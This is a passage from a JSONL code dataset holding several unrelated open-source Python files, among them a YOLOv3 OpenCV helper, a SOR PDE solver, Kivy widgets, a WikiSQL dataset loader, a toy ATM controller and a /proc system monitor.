in_key, out_key)\n self.connections[connection.key] = 
connection\n","repo_name":"inigo-irigaray/NEAT-neuroevolution-pytorch","sub_path":"neuroevolution/genome.py","file_name":"genome.py","file_ext":"py","file_size_in_byte":18884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19952519149","text":"from __future__ import annotations\nfrom typing import TYPE_CHECKING, List\nif TYPE_CHECKING:\n from CV_Robot.vision import VisionObject\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport copy\nimport cv2\nimport os\n\nfrom CV_Robot import useLiveImg, is_Server, is_Robot\n\nfig = None\nax = None\n\nimg_typ = np.ndarray\n\ndef load_model():\n \"\"\"\n Loads Yolo v3 model (called automtically on import)\n \"\"\"\n yolov3_path = os.path.dirname(__file__) + '/Models/Yolo v3/'\n try:\n with open(yolov3_path + 'yolov3.weights'):\n pass\n except FileNotFoundError:\n print(\"Downloading model...\")\n import wget\n import sys\n def bar_custom(current, total, _): #_ = width\n sys.stdout.write(\"\\r\")\n sys.stdout.write(\"Downloading: %d%% [%d / %d] bytes\" % (current / total * 100, current, total))\n\n wget.download('https://pjreddie.com/media/files/yolov3.weights', yolov3_path + 'yolov3.weights', bar=bar_custom)\n print()\n\n net: cv2.dnn_Net = cv2.dnn.readNet(yolov3_path + \"yolov3.weights\", yolov3_path + \"yolov3.cfg\")\n with open(yolov3_path + \"yolov3.names\", \"r\") as f:\n classes = [line.strip() for line in f.readlines()]\n\n output_layers = [layer_name for layer_name in net.getUnconnectedOutLayersNames()]\n return net, classes, output_layers\n\ncache = []\ndef detect_objects(img: img_typ, net: cv2.dnn_Net, outputLayers: list):\n \"\"\"\n Returns DNN outputs for finding objects in image, uses cache if possible\n \"\"\"\n retval = None\n for c_img, c_outputs in cache:\n if np.array_equal(img, c_img):\n retval = c_outputs\n\n if retval is None:\n blob = cv2.dnn.blobFromImage(img, scalefactor=0.00392, size=(320, 320), mean=(0, 0, 0), swapRB=True, crop=False)\n net.setInput(blob)\n retval = net.forward(outputLayers)\n\n if len(cache) >= 5:\n cache.pop(0)\n cache.append((img, retval))\n\n return retval\n\ndef get_box_dimensions(outputs: list, thresh: float = 0.3):\n \"\"\"\n Returns X, Y, width, height of objects\n \"\"\"\n boxes = []\n confs = []\n class_ids = []\n for output in outputs:\n for detect in output:\n scores = detect[5:]\n class_id = np.argmax(scores)\n conf = scores[class_id]\n if conf > thresh:\n center_x = detect[0] * 100\n center_y = detect[1] * 100\n w = round(detect[2] * 100, 3)\n h = round(detect[3] * 100, 3)\n x = round(center_x - w / 2, 3)\n y = round(center_y - h / 2, 3)\n boxes.append([x, y, w, h])\n confs.append(float(conf))\n class_ids.append(class_id)\n return boxes, confs, class_ids\n\ndef show_image(img: img_typ, pause: bool =False):\n \"\"\"\n Displays Matplotlib render of image\n If on Colab - display in new figure\n If on Server - display in exisiting figure with optional pause\n If on Robot - save as \"cv_robot_img.py\"\n \"\"\"\n global fig\n global ax\n\n if is_Robot or (is_Server and not useLiveImg):\n with open('userscripts/img.lck', 'w+') as f:\n f.write(\"lck\")\n cv2.imwrite(\"userscripts/cv_robot_img.png\", img)\n with open('userscripts/img.lck', 'w+') as f:\n f.write(\"\")\n return\n\n t_img = img[:, :, ::-1] # convert BGR (for opencv) to RGB (for matplotlib)\n if fig is None or not plt.fignum_exists(fig.number):\n fig = plt.figure(figsize=(10, 10))\n ax = fig.add_subplot()\n ax.clear()\n ax.imshow(t_img)\n\n x_space = img.shape[1] * 
x_space = img.shape[1] * 0.25\n y_space = img.shape[0] * 0.25\n\n ax.set_xticks([i * x_space for i in range(0, 5)], minor=False)\n ax.set_yticks([i * y_space for i in range(0, 5)], minor=False)\n ax.set_xticklabels(list(range(0, 101, 25)), fontdict=None, minor=False)\n ax.set_yticklabels(list(range(0, 101, 25)), fontdict=None, minor=False)\n\n if is_Server and not pause:\n plt.draw()\n plt.pause(0.1)\n else:\n plt.show()\n\n\n\ndef draw_labels(objects: List[VisionObject], img: img_typ, pause: bool = False):\n \"\"\"\n Draw labeled boxes on image\n \"\"\"\n global fig\n global ax\n\n img = copy.deepcopy(img)\n font = cv2.FONT_HERSHEY_PLAIN\n for index, obj in enumerate(objects):\n x, y, w, h = obj.BBox\n x = int(x * img.shape[1] / 100)\n w = int(w * img.shape[1] / 100)\n y = int(y * img.shape[0] / 100)\n h = int(h * img.shape[0] / 100)\n\n label = str(obj.Name)\n color = (0, 0, 255) # red (BGR)\n cv2.rectangle(img, (x, y), (x + w, y + h), color, 2)\n cv2.putText(img, label, (x, y - 5), font, 1, color, 1)\n\n show_image(img, pause=pause)\n\n\n","repo_name":"RobertJN64/CV_Robot","sub_path":"CV_Robot/opencv_api.py","file_name":"opencv_api.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"18203204082","text":"import pytest\n\nfrom pystarling.api_objects.Address import Address\n\n\nclass TestAddress(object):\n test_data = {\n 'streetAddress': '123 Fake St',\n 'city': 'Springfield',\n 'country': 'USA',\n 'postcode': 'N1 1AA'\n }\n\n incomplete_data = {\n 'city': 'Springfield'\n }\n\n def test_incomplete_data_raises_error(self):\n with pytest.raises(KeyError):\n Address(self.incomplete_data)\n\n def test_data_parsed_correctly(self):\n address = Address(self.test_data)\n assert address.street_address == '123 Fake St'\n assert address.city == 'Springfield'\n assert address.country == 'USA'\n assert address.postcode == 'N1 1AA'\n","repo_name":"rdcrt/pystarling","sub_path":"test/api_objects/test_Address.py","file_name":"test_Address.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"33753464458","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom Proj2_part_1_01345671 import get_neighbours, SOR\n\n\nclass ModifiedSOR(SOR):\n\n def get_value(self, phi, i, j):\n x = i * self.dx - self.q\n y = j * self.dy\n\n ns = get_neighbours(phi, i, j)\n\n \"\"\"\n Require U_-1 = U_1 to apply Neumann boundary conditions\n \"\"\"\n rows, cols = phi.shape\n if j == cols - 1:\n ns.update({'n': phi[i, j - 1]})\n if j == 0:\n ns.update({'s': phi[i, j + 1]})\n if i == 0:\n ns.update({'w': phi[i + 1, j]})\n if i == rows - 1:\n ns.update({'e': phi[i - 1, j]})\n\n if 0 < x < 0.5 or 0.5 < x < 1: # exclude x = 0.5, where y_b_x vanishes\n \"\"\"\n In this range the transformation has been applied, so we treat\n y values as eta\n \"\"\"\n y_b_x = 2 * self.tau * (1 - 2 * x)\n m = (1 - 1 / (y_b_x ** 2)) / (self.dx ** 2)\n n = 1 / (self.dy ** 2)\n return (m * (ns['e'] + ns['w']) +\n n * (ns['n'] + ns['s']) -\n self.fs[i, j]) / (2 * m * n)\n else:\n return self.step_func(phi, ns, self.fs[i, j])\n\n\nif __name__ == \"__main__\":\n \"\"\"\n Must have L and N of form 2^p + 1\n \"\"\"\n q, s, r, L, N, tao, w = 2, 3, 1, 65, 65, 0.05, 1.8\n scheme = ModifiedSOR(\n np.zeros((L, N)), np.zeros((L, N)),\n q=q, s=s, r=r, tao=tao, w=w\n )\n u, step = scheme.iteration_loop(sweep_limit=100000)\n # us, vs = scheme.get_derivatives()\n X = np.linspace(-q, s, num=L)\n Y = np.linspace(0, r, num=N)\n [us, 
vs] = np.gradient(u)\n\n field = plt.figure(1)\n ax1 = field.add_subplot()\n q = ax1.quiver(X, Y, np.transpose(us), np.transpose(vs), np.transpose(u),\n cmap='plasma')\n ax1.set_title('Vector field')\n ax1.set_xlabel('x')\n ax1.set_ylabel('y')\n\n surface = plt.figure(2)\n ax2 = surface.add_subplot(projection='3d')\n Xm, Ym = np.meshgrid(X, Y)\n ax2.plot_surface(Xm, Ym, np.transpose(u), cmap='plasma')\n ax2.set_title('Surface')\n ax2.set_xlabel('x')\n ax2.set_ylabel('y')\n\n u_surface = plt.figure(3)\n ax3 = u_surface.add_subplot(projection='3d')\n ax3.plot_surface(Xm, Ym, np.transpose(us), cmap='plasma')\n ax3.set_title('U_surface')\n ax3.set_xlabel('x')\n ax3.set_ylabel('y')\n\n v_surface = plt.figure(4)\n ax3 = v_surface.add_subplot(projection='3d')\n ax3.plot_surface(Xm, Ym, np.transpose(vs), cmap='plasma')\n ax3.set_title('V_surface')\n ax3.set_xlabel('x')\n ax3.set_ylabel('y')\n\n plt.show()\n","repo_name":"kimizake/PDE-project-2","sub_path":"Proj2_part_3_01345671.py","file_name":"Proj2_part_3_01345671.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7803427263","text":"from kivy.lang import Builder\nfrom kivy.uix.screenmanager import ScreenManager, Screen, NoTransition\nfrom kivy.core.window import Window\nfrom kivy.uix.button import Button\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.tabbedpanel import TabbedPanel, TabbedPanelItem\nfrom constants import *\n\n\n##\n# Class: HoverButton extends Button\n# ---------------------------------\n# This class is a button widget that has the ability to change\n# backgrounds when the mouse is hovered over it.\n##\nclass HoverButton(Button):\n # can set a group of buttons to not hover\n # (used for when buttons overlap)\n inactive_group = None\n\n\n ##\n # Class Constructor: __init__\n # ---------------------------\n # This method is called during the creation of the HoverButton object.\n #\n # @params\n # (HoverButton) self This instance of HoverButton\n # (str) button_up Filename of image when button is up (not hovered)\n # (str) button_down Filename of image when button is down (hovered)\n # (str) group Name of button group, used to make button inactive\n ##\n def __init__(self, button_up=BTN_TRANSP[0],\n button_down=BTN_TRANSP[1],\n group = None,\n **kwargs):\n super(HoverButton, self).__init__(**kwargs)\n self.group = group\n self.button_up = button_up\n self.button_down = button_down\n self.background_down = self.button_up\n self.background_normal= self.button_up\n Window.bind(mouse_pos=self.on_mouse_move)\n\n\n ##\n # Class Method: on_mouse_move\n # ---------------------------\n # This method is called whenever the mouse position is changed. This function\n # tracks the position of the mouse and if the mouse is colliding with the widget\n # then the button background is changed to self.button_down. 
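Positions arrive in window\n # coordinates and are converted with to_widget before the collision test. 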
Background is not\n # changed if the instance's group is the inactive group.\n #\n # @params\n # (HoverButton) self This instance of HoverButton\n # (list) *args List of mouse position/movement info\n ##\n def on_mouse_move(self, *args):\n pos = self.to_widget(x=args[1][0], y=args[1][1])\n if self.collide_point(*pos) and \\\n (self.group != HoverButton.inactive_group or \\\n HoverButton.inactive_group == None):\n self.background_normal= self.button_down\n else:\n self.background_normal= self.button_up\n\n\n\n##\n# Class: HoverTab\n# ---------------\n# This class is a TabbedPanelItem whose text becomes brighter whenever\n# the mouse is hovered over it.\n##\nclass HoverTab(TabbedPanelItem):\n ##\n # Class Constructor: __init__\n # ---------------------------\n # This method is called during the creation of the HoverTab object.\n #\n # @params\n # (HoverTab) self This instance of HoverTab\n # (Various) **kwargs Arguments for construction of internal TabbedPanelItem\n ##\n def __init__(self, **kwargs):\n super(HoverTab, self).__init__(**kwargs)\n self.color = (1,1,1,.8)\n Window.bind(mouse_pos=self.on_mouse_move)\n\n ##\n # Class Method: on_mouse_move\n # ---------------------------\n # This method is called whenever the mouse position is changed. This function\n # tracks the position of the mouse and if the mouse is colliding with the widget\n # then the tab text is made brighter.\n #\n # @params\n # (HoverTab) self This instance of HoverTab\n # (list) *args List of mouse position/movement info\n ##\n def on_mouse_move(self, *args):\n pos = self.to_widget(x=args[1][0], y=args[1][1])\n if self.collide_point(*pos) or self.state == 'down':\n self.color = (1,1,1,1)\n else:\n self.color = (1,1,1,.8)\n","repo_name":"davisgomes/FRAG","sub_path":"customwidgets.py","file_name":"customwidgets.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36146897339","text":"from itertools import product\n\n# We are only interested in TMs with a single transition to the halt state\nchoices = [\"00\", \"01\", \"02\", \"03\", \"04\", \"05\",\n \"10\", \"11\", \"12\", \"13\", \"14\", \"15\"]\n\nhalt_state = \"21\"\n\n\ndef generate_tms(filepath, test_function):\n lines = []\n for choice in product(choices, repeat=5):\n choice = list(choice)\n possible_choices = [\"\".join(choice[:i] + [halt_state] + choice[i:])\n for i in range(6)]\n\n lines += [x for x in possible_choices if test_function(x)]\n\n lines = sorted(lines)\n\n with open(filepath, \"w+\") as f:\n f.write(\"\\n\".join(lines))\n","repo_name":"jameshamm/OverloadedBeaver","sub_path":"generate_tms/gen_tms.py","file_name":"gen_tms.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2347281530","text":"\"\"\"A large crowd-sourced dataset for developing natural language interfaces for relational databases\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nimport json\nimport os\n\nimport nlp\n\n\n_CITATION = \"\"\"\\\n@article{zhongSeq2SQL2017,\n author = {Victor Zhong and\n Caiming Xiong and\n Richard Socher},\n title = {Seq2SQL: Generating Structured Queries from Natural Language using\n Reinforcement Learning},\n journal = {CoRR},\n volume = {abs/1709.00103},\n year = {2017}\n}\n\"\"\"\n\n_DESCRIPTION = \"\"\"\\\nA large crowd-sourced dataset for developing natural language interfaces for relational databases\n\"\"\"\n\n_DATA_URL 
= \"https://github.com/salesforce/WikiSQL/raw/master/data.tar.bz2\"\n\n_AGG_OPS = [\"\", \"MAX\", \"MIN\", \"COUNT\", \"SUM\", \"AVG\"]\n_COND_OPS = [\"=\", \">\", \"<\", \"OP\"]\n\n\nclass WikiSQL(nlp.GeneratorBasedBuilder):\n \"\"\"WikiSQL: A large crowd-sourced dataset for developing natural language interfaces for relational databases\"\"\"\n\n VERSION = nlp.Version(\"0.1.0\")\n\n def _info(self):\n return nlp.DatasetInfo(\n description=_DESCRIPTION,\n features=nlp.Features(\n {\n \"phase\": nlp.Value(\"int32\"),\n \"question\": nlp.Value(\"string\"),\n \"table\": {\n \"header\": nlp.features.Sequence(nlp.Value(\"string\")),\n \"page_title\": nlp.Value(\"string\"),\n \"page_id\": nlp.Value(\"string\"),\n \"types\": nlp.features.Sequence(nlp.Value(\"string\")),\n \"id\": nlp.Value(\"string\"),\n \"section_title\": nlp.Value(\"string\"),\n \"caption\": nlp.Value(\"string\"),\n \"rows\": nlp.features.Sequence(nlp.features.Sequence(nlp.Value(\"string\"))),\n \"name\": nlp.Value(\"string\"),\n },\n \"sql\": {\n \"human_readable\": nlp.Value(\"string\"),\n \"sel\": nlp.Value(\"int32\"),\n \"agg\": nlp.Value(\"int32\"),\n \"conds\": nlp.features.Sequence(\n {\n \"column_index\": nlp.Value(\"int32\"),\n \"operator_index\": nlp.Value(\"int32\"),\n \"condition\": nlp.Value(\"string\"),\n }\n ),\n },\n }\n ),\n # If there's a common (input, target) tuple from the features,\n # specify them here. They'll be used if as_supervised=True in\n # builder.as_dataset.\n supervised_keys=None,\n # Homepage of the dataset for documentation\n homepage=\"https://github.com/salesforce/WikiSQL\",\n citation=_CITATION,\n )\n\n def _split_generators(self, dl_manager):\n \"\"\"Returns SplitGenerators.\"\"\"\n dl_dir = dl_manager.download_and_extract(_DATA_URL)\n dl_dir = os.path.join(dl_dir, \"data\")\n\n return [\n nlp.SplitGenerator(\n name=nlp.Split.TEST,\n gen_kwargs={\n \"main_filepath\": os.path.join(dl_dir, \"test.jsonl\"),\n \"tables_filepath\": os.path.join(dl_dir, \"test.tables.jsonl\"),\n },\n ),\n nlp.SplitGenerator(\n name=nlp.Split.VALIDATION,\n gen_kwargs={\n \"main_filepath\": os.path.join(dl_dir, \"dev.jsonl\"),\n \"tables_filepath\": os.path.join(dl_dir, \"dev.tables.jsonl\"),\n },\n ),\n nlp.SplitGenerator(\n name=nlp.Split.TRAIN,\n gen_kwargs={\n \"main_filepath\": os.path.join(dl_dir, \"train.jsonl\"),\n \"tables_filepath\": os.path.join(dl_dir, \"train.tables.jsonl\"),\n },\n ),\n ]\n\n def _convert_to_human_readable(self, sel, agg, columns, conditions):\n \"\"\"Make SQL query string. 
Based on https://github.com/salesforce/WikiSQL/blob/c2ed4f9b22db1cc2721805d53e6e76e07e2ccbdc/lib/query.py#L10\"\"\"\n\n rep = \"SELECT {agg} {sel} FROM table\".format(\n agg=_AGG_OPS[agg], sel=columns[sel] if columns is not None else \"col{}\".format(sel)\n )\n\n if conditions:\n rep += \" WHERE \" + \" AND \".join([\"{} {} {}\".format(columns[i], _COND_OPS[o], v) for i, o, v in conditions])\n return \" \".join(rep.split())\n\n def _generate_examples(self, main_filepath, tables_filepath):\n \"\"\"Yields examples.\"\"\"\n\n # Build a dictionary mapping table_id -> table\n with open(tables_filepath) as f:\n tables = [json.loads(line) for line in f]\n id_to_tables = {x[\"id\"]: x for x in tables}\n\n with open(main_filepath) as f:\n for idx, line in enumerate(f):\n row = json.loads(line)\n row[\"table\"] = id_to_tables[row[\"table_id\"]]\n del row[\"table_id\"]\n\n # Handle missing data\n row[\"table\"][\"page_title\"] = row[\"table\"].get(\"page_title\", \"\")\n row[\"table\"][\"section_title\"] = row[\"table\"].get(\"section_title\", \"\")\n row[\"table\"][\"caption\"] = row[\"table\"].get(\"caption\", \"\")\n row[\"table\"][\"name\"] = row[\"table\"].get(\"name\", \"\")\n row[\"table\"][\"page_id\"] = str(row[\"table\"].get(\"page_id\", \"\"))\n\n # Fix row types\n row[\"table\"][\"rows\"] = [[str(e) for e in r] for r in row[\"table\"][\"rows\"]]\n\n # Get human-readable version\n row[\"sql\"][\"human_readable\"] = self._convert_to_human_readable(\n row[\"sql\"][\"sel\"], row[\"sql\"][\"agg\"], row[\"table\"][\"header\"], row[\"sql\"][\"conds\"],\n )\n\n # Restructure sql->conds\n # - wikiSQL provides a tuple [column_index, operator_index, condition]\n # as 'condition' can have 2 types (float or str) we convert to dict\n for i in range(len(row[\"sql\"][\"conds\"])):\n row[\"sql\"][\"conds\"][i] = {\n \"column_index\": row[\"sql\"][\"conds\"][i][0],\n \"operator_index\": row[\"sql\"][\"conds\"][i][1],\n \"condition\": str(row[\"sql\"][\"conds\"][i][2]),\n }\n yield idx, row\n","repo_name":"MachineLearningBCAM/Minimax-risk-classifiers-NeurIPS-2020","sub_path":"venv/lib/python3.6/site-packages/nlp/datasets/wikisql/46eb569a3cc9ef4b2b9505b938564a4855d92f6ed051c7176b41d9ea2eec0180/wikisql.py","file_name":"wikisql.py","file_ext":"py","file_size_in_byte":6443,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"20317519706","text":"import random\n\nclass Woori:\n def __init__(self):\n self.data_dict = {}\n\n\n def new_acc(self, card_no, account, amt):\n if card_no in self.data_dict:\n self.data_dict[card_no][\"account\"][account] = amt\n\n def new_card(self, card_no, paswd, account, amt):\n self.data_dict[card_no] = {\"account\": {account: amt}, \"pin\": paswd}\n\n def passwd_check(self, card_num, entered_pin):\n if card_num in self.data_dict and self.data_dict[card_num][\"pin\"] == entered_pin:\n return self.data_dict[card_num][\"account\"]\n else:\n return None\n\n def update_account(self, card_num, account, amt):\n if account in self.data_dict[card_num][\"account\"]:\n self.data_dict[card_num][\"account\"][account] = amt\n return True\n else:\n return False\n\n\nclass Controller:\n def __init__(self, bank, cash):\n self.accounts = None\n self.Woori = bank\n self.cash_bin = cash\n\n def insert_card(self, card_num, pin):\n self.accounts = self.Woori.passwd_check(card_num, pin)\n if self.accounts is not None:\n return 1, \"Welcome!\"\n else:\n return 0, \"Invalid card or wrong password\"\n\n 
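# an account is selectable only if it exists on the inserted card\n 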
def acc_selection(self, acc):\n if acc in self.accounts:\n return True\n else:\n return False\n\n def account_actions(self, card_num, acc, action, amt=0):\n if action == \"See Balance\":\n return self.accounts[acc], 1, 0\n elif action == \"Withdraw\":\n if self.cash_bin >= amt and self.accounts[acc] >= amt:\n updated_balance = self.accounts[acc] - amt\n self.cash_bin = self.cash_bin - amt\n self.accounts[acc] = updated_balance\n self.Woori.update_account(card_num, acc, updated_balance)\n return self.accounts[acc], 1, 0\n elif self.cash_bin < amt:\n return self.accounts[acc], 0, 1\n elif self.accounts[acc] < amt:\n return self.accounts[acc], 0, 2\n elif action == \"Deposit\":\n updated_balance = self.accounts[acc] + amt\n self.cash_bin = self.cash_bin + amt\n self.accounts[acc] = updated_balance\n self.Woori.update_account(card_num, acc, updated_balance)\n return self.accounts[acc], 1, 0\n else:\n return self.accounts[acc], 2, 0\n\n def __call__(self, card_num, pin, acc, action_list):\n a, b = self.insert_card(card_num, pin)\n if a == 0:\n return \"Invalid card or wrong password\"\n check = self.acc_selection(acc)\n if check is False:\n return \"Invalid Account!\"\n for action in action_list:\n if action[0] == \"Leave\":\n return \"Left successfully\"\n balance, bit, bit1 = self.account_actions(card_num, acc, action[0], action[1])\n if bit == 0:\n continue\n elif bit == 2:\n return \"Invalid operation\"\n else:\n continue\n return \"Operations completed\"\n\n\nif __name__ == \"__main__\":\n\n\n empty_bank = Woori()\n # Test Controller on Empty Woori\n empty_atm = Controller(empty_bank, 0)\n valid, message = empty_atm.insert_card(0, 0)\n if valid == 0:\n print(\"Test Invalid Message on Empty ATM \\t SUCCESS\")\n else:\n print(\"Test Invalid Message on Empty ATM \\t FAILURE\")\n\n # New bank for testing\n\n test_bank = Woori()\n test_bank.new_card(20202021, 1234, \"checking\", 1000)\n test_bank.new_acc(20202021, \"savings\", 1000)\n test_bank.new_card(20192020, 4860, \"checking\", 5000)\n test_atm = Controller(test_bank, 10000)\n operations = [(\"Withdraw\", 40), (\"See Balance\", 0), (\"Deposit\", 100), (\"Withdraw\", 1000)]\n\n # Testing the ATM with valid sequence of operations\n if test_atm(20192020, 4860, \"checking\", operations) == \"Operations completed\":\n print(\"Test Valid ATM Check \\t SUCCESS\")\n else:\n print(\"Test Valid ATM Check \\t FAILURE\")\n\n # Testing if overdraft is handled correctly\n if test_atm(20202021, 1234, \"checking\", operations) == \"Operations completed\":\n print(\"Test Overdraft handling \\t SUCCESS\")\n else:\n print(\"Test Overdraft handling \\t FAILURE\")\n\n # Test invalid PIN number\n if test_atm(20192020, 9878, \"checking\", operations) == \"Invalid card or wrong password\":\n print(\"Test Incorrect password \\t SUCCESS\")\n else:\n print(\"Test Incorrect password \\t FAILURE\")\n\n # Test invalid Account no\n if test_atm(876504321, 1234, \"checking\", operations) == \"Invalid card or wrong password\":\n print(\"Test Invalid Account Number \\t SUCCESS\")\n else:\n print(\"Test Invalid Account Number \\t FAILURE\")\n\n test_bank2 = Woori()\n test_bank2.new_card(20202021, 1234, \"checking\", 1000)\n test_bank2.new_acc(20202021, \"savings\", 1000)\n test_bank2.new_card(20192020, 4860, \"checking\", 5000)\n test_atm2 = Controller(test_bank2, 10000)\n cash_bin_over_action = [(\"See Balance\", 0), (\"Withdraw\", 30000)]\n\n # Tests cash bin excess handling on account balance\n if test_atm(20192020, 4860, \"checking\", cash_bin_over_action) == \"Operations 
completed\":\n print(\"Test Exceeding Cash Bin \\t SUCCESS\")\n else:\n print(\"Test Exceeding Cash Bin \\t FAILURE\")\n\n exit_action = [(\"See Balance\", 0), (\"Leave\", 0)]\n if test_atm(20192020, 4860, \"checking\", exit_action) == \"Left successfully\":\n print(\"Test exiting \\t SUCCESS\")\n else:\n print(\"Test exiting \\t FAILURE\")\n\n test_bank = Woori()\n card_num = 20180821\n test_bank.new_card(card_num, 1234, \"stipend\", 20000)\n test_bank.new_acc(card_num, \"savings\", 15000)\n test_atm = Controller(test_bank, 10000)\n\n #while True:\n pin = int(input(\"\\n Please Enter Your account pin: \"))\n a, b = test_atm.insert_card(card_num, pin)\n while a == 0:\n pin = int(input(\"\\nInvalid Pin.. Re-enter your Pin please: \"))\n a, b = test_atm.insert_card(card_num, pin)\n print(\"\\nSelect Account:\")\n print(\"\\n1 - Savings \\t 2 - Stipend\")\n temp = int(input(\"\\nEnter your selection: \"))\n account= \"none\"\n if temp == 1:\n account = \"savings\"\n if temp == 2:\n account = \"stipend\"\n\n while True:\n print(\"\\n1 - Balance \\t 2 - Withdraw \\t 3 - Deposit \\t 4 - Quit \")\n selection = int(input(\"\\nEnter your selection: \"))\n if selection == 1:\n balance, void, void1 = test_atm.account_actions(card_num, account, \"See Balance\")\n print(\"Your Balance is: \" + str(balance) +\" KRW\")\n if selection==2:\n balance, void, void1 = test_atm.account_actions(card_num, account, \"See Balance\")\n print(\"Your Balance is: \" + str(balance)+\" KRW\")\n amt = int(input(\"\\nPlease Enter amount to withdraw: \"))\n balance, void, void1 = test_atm.account_actions(card_num, account, \"Withdraw\",amt)\n if void==0 and void1==2:\n print(\"Please enter a valid amount\")\n if void==0 and void1==1:\n print(\"There is not enough cash in the ATM\")\n balance, void, void1 = test_atm.account_actions(card_num, account, \"See Balance\")\n print(\"Your Balance is: \" + str(balance)+\" KRW\")\n if selection==3:\n amt = int(input(\"\\nEnter an amount to deposit: \"))\n test_atm.account_actions(card_num, account, \"Deposit\", amt)\n balance, void, void1 = test_atm.account_actions(card_num, account, \"See Balance\")\n print(\"Your Balance is: \" + str(balance)+\" KRW\")\n if selection == 4:\n flag = input(\"Are you sure you want to quit?, Yes, or No:\")\n if flag.lower() == \"yes\":\n print(\"\\nYour Transaction is complete\")\n print(\"Transaction number: \", random.randint\n (10000, 1000000))\n print(\"Thanks for choosing us as your bank\")\n break\n","repo_name":"abbasly/Simple_ATM_Controller","sub_path":"atmCont.py","file_name":"atmCont.py","file_ext":"py","file_size_in_byte":8014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32513987778","text":"# Exercise Question 1: Create a Vehicle class with name of vehicle,\n# max_speed and mileage instance attributes\n\nclass Vehicle:\n def __init__(self,name, max_speed, mileage):\n self.name=name\n self.max_speed = max_speed\n self.mileage = mileage\n\nvehicle1 = Vehicle(\"Volvo\",240, 18)\nprint(vehicle1.max_speed, vehicle1.mileage)","repo_name":"QAMilestoneAcademy/python_basic","sub_path":"Class20-21-22-23-24-objectoriented/Excercise_ObjectOriented/excercise_1.py","file_name":"excercise_1.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31295778241","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nfrom collections import OrderedDict\nimport pprint\nimport sys, 
time\n\ndef CPUinfo():\n ''' Return the information in /proc/cpuinfo\n as a dictionary in the following format:\n CPU_info['proc0']={...}\n CPU_info['proc1']={...}\n '''\n CPUinfo=OrderedDict()\n procinfo=OrderedDict()\n\n nprocs = 0\n with open('/proc/cpuinfo') as f:\n for line in f:\n if not line.strip():\n # end of one processor\n CPUinfo['proc%s' % nprocs] = procinfo\n nprocs=nprocs+1\n # Reset\n procinfo=OrderedDict()\n else:\n if len(line.split(':')) == 2:\n procinfo[line.split(':')[0].strip()] = line.split(':')[1].strip()\n else:\n procinfo[line.split(':')[0].strip()] = ''\n\n return CPUinfo\n\n\ndef load_stat():\n loadavg = {}\n f = open(\"/proc/loadavg\")\n con = f.read().split()\n f.close()\n loadavg['lavg_1']=con[0]\n loadavg['lavg_5']=con[1]\n loadavg['lavg_15']=con[2]\n loadavg['nr']=con[3]\n loadavg['last_pid']=con[4]\n return loadavg\n\ndef meminfo():\n ''' Return the information in /proc/meminfo\n as a dictionary '''\n meminfo=OrderedDict()\n\n with open('/proc/meminfo') as f:\n for line in f:\n meminfo[line.split(':')[0]] = line.split(':')[1].strip()\n return meminfo\n\ndef rx(STATS):\n ifstat = open('/proc/net/dev').readlines()\n for interface in ifstat:\n if INTERFACE in interface:\n stat = float(interface.split()[1])\n STATS[0:] = [stat]\n\ndef tx(STATS):\n ifstat = open('/proc/net/dev').readlines()\n for interface in ifstat:\n if INTERFACE in interface:\n stat = float(interface.split()[9])\n STATS[1:] = [stat]\n\n\n\n\nif __name__ == '__main__':\n\n if len(sys.argv) > 1:\n INTERFACE = sys.argv[1]\n else:\n INTERFACE = 'eth0'\n STATS = []\n print('Interface:', INTERFACE)\n\n print('In Out')\n rx(STATS)\n tx(STATS)\n\n while True:\n time.sleep(1)\n rxstat_o = list(STATS)\n rx(STATS)\n tx(STATS)\n RX = float(STATS[0])\n RX_O = rxstat_o[0]\n TX = float(STATS[1])\n TX_O = rxstat_o[1]\n RX_RATE = round((RX - RX_O)/1024/1024,3)\n TX_RATE = round((TX - TX_O)/1024/1024,3)\n\n print(RX_RATE ,'MB ',TX_RATE ,'MB')\n # use distinct names so the helper functions are not shadowed on later loop iterations\n cpu_info = CPUinfo()\n for processor in cpu_info.keys():\n print(cpu_info[processor]['model name'])\n\n print(\"loadavg: \", load_stat()['lavg_15'])\n\n mem_info = meminfo()\n print('Total memory: {0}'.format(mem_info['MemTotal']))\n print('Free memory: {0}'.format(mem_info['MemFree']))\n","repo_name":"dycforever/program","sub_path":"python_prog/monitors.py","file_name":"monitors.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
